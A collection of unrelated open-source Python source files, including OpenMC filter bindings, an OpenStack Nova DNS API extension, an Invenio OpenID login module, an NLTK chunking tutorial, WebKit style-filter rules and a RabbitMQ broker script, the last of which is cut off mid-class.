def bins(self):
materials = POINTER(c_int32)()
n = c_size_t()
_dll.openmc_material_filter_get_bins(self._index, materials, n)
return [Material(index=materials[i]) for i in range(n.value)]
@bins.setter
def bins(self, materials):
# Get material indices as int32_t[]
n = len(materials)
bins = (c_int32*n)(*(m._index for m in materials))
_dll.openmc_material_filter_set_bins(self._index, n, bins)
class MeshFilter(Filter):
filter_type = 'mesh'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_mesh_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_mesh_filter_set_mesh(self._index, mesh._index)
class MeshSurfaceFilter(Filter):
filter_type = 'meshsurface'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_meshsurface_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_meshsurface_filter_set_mesh(self._index, mesh._index)
class MuFilter(Filter):
filter_type = 'mu'
class ParticleFilter(Filter):
filter_type = 'particle'
class PolarFilter(Filter):
filter_type = 'polar'
class SphericalHarmonicsFilter(Filter):
filter_type = 'sphericalharmonics'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_sphharm_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_sphharm_filter_set_order(self._index, order)
class SpatialLegendreFilter(Filter):
filter_type = 'spatiallegendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_spatial_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_spatial_legendre_filter_set_order(self._index, order)
class SurfaceFilter(Filter):
filter_type = 'surface'
class UniverseFilter(Filter):
filter_type = 'universe'
class ZernikeFilter(Filter):
filter_type = 'zernike'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_zernike_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_zernike_filter_set_order(self._index, order)
class ZernikeRadialFilter(ZernikeFilter):
filter_type = 'zernikeradial'
_FILTER_TYPE_MAP = {
'azimuthal': AzimuthalFilter,
'cell': CellFilter,
'cellborn': CellbornFilter,
'cellfrom': CellfromFilter,
'cellinstance': CellInstanceFilter,
'delayedgroup': DelayedGroupFilter,
'distribcell': DistribcellFilter,
'energy': EnergyFilter,
'energyout': EnergyoutFilter,
'energyfunction': EnergyFunctionFilter,
'legendre': LegendreFilter,
'material': MaterialFilter,
'mesh': MeshFilter,
'meshsurface': MeshSurfaceFilter,
'mu': MuFilter,
'particle': ParticleFilter,
'polar': PolarFilter,
'sphericalharmonics': SphericalHarmonicsFilter,
'spatiallegendre': SpatialLegendreFilter,
'surface': SurfaceFilter,
'universe': UniverseFilter,
'zernike': ZernikeFilter,
'zernikeradial': ZernikeRadialFilter
}
def _get_filter(index):
filter_type = create_string_buffer(20)
_dll.openmc_filter_get_type(index, filter_type)
filter_type = filter_type.value.decode()
return _FILTER_TYPE_MAP[filter_type](index=index)
class _FilterMapping(Mapping):
def __getitem__(self, key):
index = c_int32()
try:
_dll.openmc_get_filter_index(key, index)
except (AllocationError, InvalidIDError) as e:
# __contains__ expects a KeyError to work correctly
raise KeyError(str(e))
return _get_filter(index.value)
def __iter__(self):
for i in range(len(self)):
yield _get_filter(i).id
def __len__(self):
return _dll.tally_filters_size()
def __repr__(self):
return repr(dict(self))
filters = _FilterMapping()
| mit-crpg/openmc | openmc/lib/filter.py | Python | mit | 16,055 | 0.000561 |
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import exception
from nova.i18n import _
from nova import network
from nova import utils
ALIAS = "os-floating-ip-dns"
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSDomainController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors(501)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
try:
domains = self.network_api.get_dns_domains(context)
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@extensions.expected_errors((422, 501))
def update(self, req, id, body):
"""Add or modify domain entry."""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
try:
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
@extensions.expected_errors((404, 501))
@wsgi.response(202)
def delete(self, req, id):
"""Delete the domain identified by id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except NotImplementedError:
msg = _("Unable to delete dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSEntryController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors((422, 404, 501))
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
floating_ip = None
# Check whether id is a valid ipv4/ipv6 address.
if utils.is_valid_ipv4(id) or utils.is_valid_ipv6(id):
floating_ip = id
try:
if floating_ip:
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
else:
entries = self.network_api.get_dns_entries_by_name(context,
id,
domain)
except NotImplementedError:
msg = _("Unable to get dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
if not entries:
explanation = _("DNS entries not found.")
raise webob.exc.HTTPNotFound(explanation=explanation)
if floating_ip:
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
dns_entries = _translate_dns_entries_view(entrylist)
return wsgi.ResponseObject(dns_entries)
entry = _create_dns_entry(entries[0], id, domain)
return _translate_dns_entry_view(entry)
@extensions.expected_errors((422, 501))
def update(self, req, domain_id, id, body):
"""Add or modify dns entry."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
try:
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
if not entries:
# create!
self.network_api.add_dns_entry(context, address, name,
dns_type, domain)
else:
# modify!
self.network_api.modify_dns_entry(context, name,
address, domain)
except NotImplementedError:
msg = _("Unable to update dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
return _translate_dns_entry_view({'ip': address,
'name': name,
'type': dns_type,
'domain': domain})
@extensions.expected_errors((404, 501))
@wsgi.response(202)
def delete(self, req, domain_id, id):
"""Delete the entry identified by req and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
self.network_api.delete_dns_entry(context, name, domain)
except NotImplementedError:
msg = _("Unable to delete dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FloatingIpDns(extensions.V3APIExtensionBase):
"""Floating IP DNS support."""
name = "FloatingIpDns"
alias = ALIAS
version = 1
def get_resources(self):
resources = []
res = extensions.ResourceExtension(ALIAS,
controller=FloatingIPDNSDomainController())
resources.append(res)
res = extensions.ResourceExtension('entries',
controller=FloatingIPDNSEntryController(),
parent={'member_name': 'domain',
'collection_name': 'os-floating-ip-dns'})
resources.append(res)
return resources
def get_controller_extensions(self):
"""It's an abstract function V3APIExtensionBase and the extension
will not be loaded without it.
"""
return []
| badock/nova | nova/api/openstack/compute/plugins/v3/floating_ip_dns.py | Python | apache-2.0 | 10,441 | 0.000958 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
This module contains functions and methods to authenticate with OpenID
providers.
"""
__revision__ = \
"$Id$"
from invenio.config import CFG_SITE_SECURE_URL
from invenio.external_authentication import ExternalAuth
from invenio.session import get_session
class ExternalOpenID(ExternalAuth):
"""
Contains methods for authenticate with an OpenID provider.
"""
@staticmethod
def __init_req(req):
req.g['openid_provider_name'] = ''
req.g['openid_debug'] = 0
req.g['openid_msg'] = ''
req.g['openid_debug_msg'] = ''
req.g['openid_response'] = None
def auth_user(self, username, password, req=None):
"""
Tries to find email and OpenID identity of the user. If it
doesn't find any of them, returns (None, None)
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType, str|NoneType
"""
from openid.consumer import consumer
self._get_response(req)
response = req.g['openid_response']
identity = None
email = None
if response.status == consumer.SUCCESS:
# In the first login of the user, fetches his/her email
# from OpenID provider.
email = self._get_email_from_success_response(req)
identity = response.getDisplayIdentifier()
elif response.status == consumer.CANCEL:
# If user cancels the verification, set corresponding message.
req.openid_msg = 21
elif response.status == consumer.FAILURE:
# If verification fails, set corresponding message.
req.openid_msg.msg = 22
return email, identity
@staticmethod
def get_msg(req):
return req.g['openid_msg']
def fetch_user_nickname(self, username, password=None, req=None):
"""
Fetches the OpenID provider for nickname of the user. If it doesn't
find any, returns None.
This function doesn't need username, password or req. They are exist
just because this class is derived from ExternalAuth
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType
"""
from openid.extensions import ax
from openid.extensions import sreg
nickname = None
# May be either Simple Registration (sreg) response or
# Attribute Exchange (ax) response.
sreg_resp = None
ax_resp = None
response = req.g['openid_response']
sreg_resp = sreg.SRegResponse.fromSuccessResponse(response)
if sreg_resp:
if sreg_resp.getExtensionArgs().has_key('nickname'):
nickname = sreg_resp.getExtensionArgs()['nickname']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp and not nickname:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not nickname:
if extensions['type.ext1'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext1.1']
return nickname
@staticmethod
def _get_email_from_success_response(req):
"""
Fetches the email from consumer.SuccessResponse. If it doesn't find any
returns None.
@rtype: str|NoneType
"""
from openid.extensions import ax
email = None
response = req.g['openid_response']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not email:
if extensions['type.ext1'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext1.1']
return email
@staticmethod
def _get_response(req):
"""
Constructs the response returned from the OpenID provider
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
"""
from invenio.webinterface_handler import wash_urlargd
from openid.consumer import consumer
content = {}
for key in req.form.keys():
content[key] = (str, '')
args = wash_urlargd(req.form, content)
if args.has_key('ln'):
del args['ln']
if args.has_key('referer'):
if not args['referer']:
del args['referer']
oidconsumer = consumer.Consumer({"id": get_session(req)}, None)
url = CFG_SITE_SECURE_URL + "/youraccount/login"
req.g['openid_provider_name'] = args['provider']
req.g['openid_response'] = oidconsumer.complete(args, url)
| Panos512/invenio | modules/webaccess/lib/external_authentication_openid.py | Python | gpl-2.0 | 6,658 | 0.004356 |
#%%
# information extraction: getting meaning from text
import nltk, re, pprint
def preprocess(document):
sents = nltk.sent_tokenize(document)
sents = [nltk.word_tokenize(sent) for sent in sents]
sents = [nltk.pos_tag(sent) for sent in sents]
return sents
#%% chunking
# NP-chunking
# one of most useful sources of information for NP-chunking is POS tags
sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"), ("dog", "NN"), ("barked", "VBD"), ("at", "IN"), ("the", "DT"), ("cat", "NN")]
grammar = "NP: {<DT>?<JJ>*<NN>}"
cp = nltk.RegexpParser(grammar)
result = cp.parse(sentence)
print(result)
result.draw()
#%%
from nltk.corpus import conll2000
print(conll2000.chunked_sents('train.txt')[99])
print(conll2000.chunked_sents('train.txt',chunk_types=['NP'])[99])
#%%
cp = nltk.RegexpParser("")
test_sents = conll2000.chunked_sents('test.txt',chunk_types=['NP'])
print(cp.evaluate(test_sents))
#%%
grammar = r"NP: {<[CDJNP].*>+}"
cp = nltk.RegexpParser(grammar)
print(cp.evaluate(test_sents))
#%%
class UnigramChunker(nltk.ChunkParserI):
def __init__(self,train_sents):
train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)] for sent in train_sents]
self.tagger = nltk.UnigramTagger(train_data)
def parse(self,sentence):
pos_tags = [pos for (word,pos) in sentence]
tagged_pos_tags = self.tagger.tag(pos_tags)
chunktags = [chunktag for (pos,chunktag) in tagged_pos_tags]
conlltags = [(word,pos,chunktag) for ((word,pos),chunktag) in zip(sentence,chunktags)]
return nltk.chunk.conlltags2tree(conlltags)
test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP'])
train_sents = conll2000.chunked_sents('train.txt',chunk_types=['NP'])
unigram_chunker = UnigramChunker(train_sents)
print(unigram_chunker.evaluate(test_sents))
#%% what learned
postags = sorted(set(pos for sent in train_sents
for (word,pos) in sent.leaves()))
print(unigram_chunker.tagger.tag(postags))
#%% classifier based chunker
# not only pos tag, but also word content
class ConsecutiveNPChunkTagger(nltk.TaggerI):
def __init__(self, train_sents):
train_set = []
for tagged_sent in train_sents:
untagged_sent = nltk.tag.untag(tagged_sent)
history = []
for i, (word, tag) in enumerate(tagged_sent):
featureset = npchunk_features(untagged_sent, i, history)
train_set.append( (featureset, tag) )
history.append(tag)
self.classifier = nltk.NaiveBayesClassifier.train(
train_set)
def tag(self, sentence):
history = []
for i, word in enumerate(sentence):
featureset = npchunk_features(sentence, i, history)
tag = self.classifier.classify(featureset)
history.append(tag)
return zip(sentence, history)
class ConsecutiveNPChunker(nltk.ChunkParserI):
def __init__(self, train_sents):
tagged_sents = [[((w,t),c) for (w,t,c) in
nltk.chunk.tree2conlltags(sent)]
for sent in train_sents]
self.tagger = ConsecutiveNPChunkTagger(tagged_sents)
def parse(self, sentence):
tagged_sents = self.tagger.tag(sentence)
conlltags = [(w,t,c) for ((w,t),c) in tagged_sents]
return nltk.chunk.conlltags2tree(conlltags)
#%%
def npchunk_features(sentence,i,history):
word,pos = sentence[i]
if i == 0:
prevword,prevpos = "<START>","<START>"
else:
prevword,prevpos = sentence[i-1]
if i == len(sentence)-1:
nextword,nextpos = "<END>","<END>"
else:
nextword,nextpos = sentence[i+1]
return {
"pos":pos,
"prevpos":prevpos,
"word":word,
"nextpos":nextpos,
"prevpos+pos":"%s+%s" % (prevpos,pos),
"pos+nextpos":"%s+%s" % (pos,nextpos),
"tags-since-dt":tags_since_dt(sentence,i)}
def tags_since_dt(sentence,i):
tags = set()
for word,pos in sentence[:i]:
if pos == "DT":
tags = set()
else:
tags.add(pos)
return '+'.join(sorted(tags))
#%%
chunker = ConsecutiveNPChunker(train_sents)
print(chunker.evaluate(test_sents))
| DoWhatILove/turtle | programming/python/library/nltk/information_extraction.py | Python | mit | 4,285 | 0.018203 |
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains filter-related code."""
def validate_filter_rules(filter_rules, all_categories):
"""Validate the given filter rules, and raise a ValueError if not valid.
Args:
filter_rules: A list of boolean filter rules, for example--
["-whitespace", "+whitespace/braces"]
all_categories: A list of all available category names, for example--
["whitespace/tabs", "whitespace/braces"]
Raises:
ValueError: An error occurs if a filter rule does not begin
with "+" or "-" or if a filter rule does not match
the beginning of some category name in the list
of all available categories.
"""
for rule in filter_rules:
if not (rule.startswith('+') or rule.startswith('-')):
raise ValueError('Invalid filter rule "%s": every rule '
"must start with + or -." % rule)
for category in all_categories:
if category.startswith(rule[1:]):
break
else:
raise ValueError('Suspected incorrect filter rule "%s": '
"the rule does not match the beginning "
"of any category name." % rule)
class _CategoryFilter(object):
"""Filters whether to check style categories."""
def __init__(self, filter_rules=None):
"""Create a category filter.
Args:
filter_rules: A list of strings that are filter rules, which
are strings beginning with the plus or minus
symbol (+/-). The list should include any
default filter rules at the beginning.
Defaults to the empty list.
Raises:
ValueError: Invalid filter rule if a rule does not start with
plus ("+") or minus ("-").
"""
if filter_rules is None:
filter_rules = []
self._filter_rules = filter_rules
self._should_check_category = {} # Cached dictionary of category to True/False
def __str__(self):
return ",".join(self._filter_rules)
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this CategoryFilter instance is equal to another."""
return self._filter_rules == other._filter_rules
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce from __eq__().
return not (self == other)
def should_check(self, category):
"""Return whether the category should be checked.
The rules for determining whether a category should be checked
are as follows. By default all categories should be checked.
Then apply the filter rules in order from first to last, with
later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
"""
if category in self._should_check_category:
return self._should_check_category[category]
should_check = True # All categories checked by default.
for rule in self._filter_rules:
if not category.startswith(rule[1:]):
continue
should_check = rule.startswith('+')
self._should_check_category[category] = should_check # Update cache.
return should_check
class FilterConfiguration(object):
"""Supports filtering with path-specific and user-specified rules."""
def __init__(self, base_rules=None, path_specific=None, user_rules=None):
"""Create a FilterConfiguration instance.
Args:
base_rules: The starting list of filter rules to use for
processing. The default is the empty list, which
by itself would mean that all categories should be
checked.
path_specific: A list of (sub_paths, path_rules) pairs
that stores the path-specific filter rules for
appending to the base rules.
The "sub_paths" value is a list of path
substrings. If a file path contains one of the
substrings, then the corresponding path rules
are appended. The first substring match takes
precedence, i.e. only the first match triggers
an append.
The "path_rules" value is the tuple of filter
rules that can be appended to the base rules.
The value is a tuple rather than a list so it
can be used as a dictionary key. The dictionary
is for caching purposes in the implementation of
this class.
user_rules: A list of filter rules that is always appended
to the base rules and any path rules. In other
words, the user rules take precedence over the
everything. In practice, the user rules are
provided by the user from the command line.
"""
if base_rules is None:
base_rules = []
if path_specific is None:
path_specific = []
if user_rules is None:
user_rules = []
self._base_rules = base_rules
self._path_specific = path_specific
self._path_specific_lower = None
"""The backing store for self._get_path_specific_lower()."""
# FIXME: Make user rules internal after the FilterConfiguration
# attribute is removed from ProcessorOptions (since at
# that point ArgumentPrinter will no longer need to
# access FilterConfiguration.user_rules).
self.user_rules = user_rules
self._path_rules_to_filter = {}
"""Cached dictionary of path rules to CategoryFilter instance."""
# The same CategoryFilter instance can be shared across
# multiple keys in this dictionary. This allows us to take
# greater advantage of the caching done by
# CategoryFilter.should_check().
self._path_to_filter = {}
"""Cached dictionary of file path to CategoryFilter instance."""
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this FilterConfiguration is equal to another."""
if self._base_rules != other._base_rules:
return False
if self._path_specific != other._path_specific:
return False
if self.user_rules != other.user_rules:
return False
return True
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce this from __eq__().
return not self.__eq__(other)
# We use the prefix "_get" since the name "_path_specific_lower"
# is already taken up by the data attribute backing store.
def _get_path_specific_lower(self):
"""Return a copy of self._path_specific with the paths lower-cased."""
if self._path_specific_lower is None:
self._path_specific_lower = []
for (sub_paths, path_rules) in self._path_specific:
sub_paths = map(str.lower, sub_paths)
self._path_specific_lower.append((sub_paths, path_rules))
return self._path_specific_lower
def _path_rules_from_path(self, path):
"""Determine the path-specific rules to use, and return as a tuple."""
path = path.lower()
for (sub_paths, path_rules) in self._get_path_specific_lower():
for sub_path in sub_paths:
if path.find(sub_path) > -1:
return path_rules
return () # Default to the empty tuple.
def _filter_from_path_rules(self, path_rules):
"""Return the CategoryFilter associated to a path rules tuple."""
# We reuse the same CategoryFilter where possible to take
# advantage of the caching they do.
if path_rules not in self._path_rules_to_filter:
rules = list(self._base_rules) # Make a copy
rules.extend(path_rules)
rules.extend(self.user_rules)
self._path_rules_to_filter[path_rules] = _CategoryFilter(rules)
return self._path_rules_to_filter[path_rules]
def _filter_from_path(self, path):
"""Return the CategoryFilter associated to a path."""
if path not in self._path_to_filter:
path_rules = self._path_rules_from_path(path)
filter = self._filter_from_path_rules(path_rules)
self._path_to_filter[path] = filter
return self._path_to_filter[path]
def should_check(self, category, path):
"""Return whether the given category should be checked.
This method determines whether a category should be checked
by checking the category name against the filter rules for
the given path.
For a given path, the filter rules are the combination of
the base rules, the path-specific rules, and the user-provided
rules -- in that order. As we will describe below, later rules
in the list take precedence. The path-specific rules are the
rules corresponding to the first element of the "path_specific"
parameter that contains a string case-insensitively matching
some substring of the path. If there is no such element,
there are no path-specific rules for that path.
Given a list of filter rules, the logic for determining whether
a category should be checked is as follows. By default all
categories should be checked. Then apply the filter rules in
order from first to last, with later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
Args:
category: The category name.
path: The path of the file being checked.
"""
return self._filter_from_path(path).should_check(category)
| cattleprod/samsung-kernel-gt-i9100 | external/webkit/WebKitTools/Scripts/webkitpy/style/filter.py | Python | gpl-2.0 | 11,910 | 0.00084 |
#!/usr/bin/env python
import sys
import os
import getopt
import time
import random
from messageQueue import MessageQueue
VERSION = 0.5
REQUEST_EXCHANGE = {"name":"Request", "ex_type":"headers"}
IDENTIFY_EXCHANGE = {"name":"Identify", "ex_type":"headers"}
RESULTS_EXCHANGE = {"name":"Results", "ex_type":"headers"}
TRANSFORM_EXCHANGE = {"name":"Transform", "ex_type":"headers"}
WEB_EXCHANGE = {"name":"Web", "ex_type":"headers"}
NIST_EXCHANGE = {"name":"NIST", "ex_type":"headers"}
SETTINGS_EXCHANGE = {'name':'settings','ex_type':'x-lvc'}
EXCHANGES = [REQUEST_EXCHANGE,IDENTIFY_EXCHANGE,RESULTS_EXCHANGE,TRANSFORM_EXCHANGE, WEB_EXCHANGE, NIST_EXCHANGE]
class MessageBrokerBase(MessageQueue):
# Base class
def __init__(self, node_name, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,routing_key='',settings=None):
super(MessageBrokerBase, self).__init__(node_name, user_id,settings=settings)
self.exchange = exchange_info
self.setup()
self.request_queue=self.queue_bind(self.exchange, header) #, routing_key)
self.log( 'starting '+self.__class__.__name__+' binding to '+exchange_info["name"])
def start(self, ):
self.start_consume(self.request_queue)
def local_exchage(self, ):
return {"name":self.node_name, "ex_type":"headers"}
def setup(self, ):
pass
#self.queue_name = self.channel.queue_declare( exclusive=False, queue = self.node_name).method.queue
# queue = "aa_"+self.node_name
class Broker(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,settings=None):
super(Broker, self).__init__("Broker", user_id,header, exchange_info,settings=settings)
def setup(self, ):
#setup the exchanges
super(Broker, self).setup()
for exchange in EXCHANGES:
self.channel.exchange_declare(exchange=exchange["name"], type=exchange["ex_type"])
def on_return_status(self, properties):
# called as RPC to return the status of a sent msg
return "[OK] from %s"%self.node_name
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
if 'filetype' in properties.headers:
import sys,re
import json
sys.path.append("..")
import modules.NISTutility as nu
#try:
filename = './output.eft'
filestr = re.search(r'base64,(.*)', json.loads(body)['file_content']).group(1)
output = open(filename, 'wb')
output.write(filestr.decode('base64'))
output.close()
NISTResult=nu.convertNIST(filename,'jpg','new_i'+filename)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
#except:
# self.send(WEB_EXCHANGE, "ERROR", properties.headers, False)
if 'setup' in properties.headers:
# Send the message back to the receiever
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
body = "Exchange params"
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
else:
# Send the message onto the Identify Exchange
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class Transformer(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = TRANSFORM_EXCHANGE,settings=None):
super(Broker, self).__init__("Transformer", user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class NISTExtractor(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
